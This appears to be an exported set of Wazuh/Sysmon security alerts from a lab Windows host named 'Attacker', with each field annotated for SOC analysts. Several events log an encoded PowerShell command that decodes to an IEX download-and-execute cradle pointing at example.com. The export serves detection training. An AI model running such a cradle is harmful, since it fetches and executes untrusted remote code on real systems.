data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_em23qzpd.dwf.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:33.220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:39.387+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:39.387+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  91
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534379.1870688
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:36.5833716Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285381
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:34.873 ProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00} ProcessId: 9052 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00} ParentProcessId: 6888 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:34.873
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bda6-680a-ab0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bda3-680a-a80b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  6888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:39.393+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:39.393+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  95
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534379.1878751
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:36.8501371Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285382
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:36.811 ProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00} ProcessId: 9052 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bh44e1ed.2pr.ps1 CreationUtcTime: 2025-04-24 22:39:36.811 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:36.811
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bda6-680a-ab0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bh44e1ed.2pr.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:36.811
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:45.976+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:45.976+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  92
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534385.1881516
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:43.3397900Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285441
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:40.470 ProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00} ProcessId: 4284 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00} ParentProcessId: 9052 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:40.470
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdac-680a-ad0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bda6-680a-ab0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:45.983+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:45.983+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  96
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534385.1889579
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:43.5281312Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285444
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:43.503 ProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00} ProcessId: 4284 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dufuzwko.3br.ps1 CreationUtcTime: 2025-04-24 22:39:43.500 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:43.503
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdac-680a-ad0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dufuzwko.3br.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

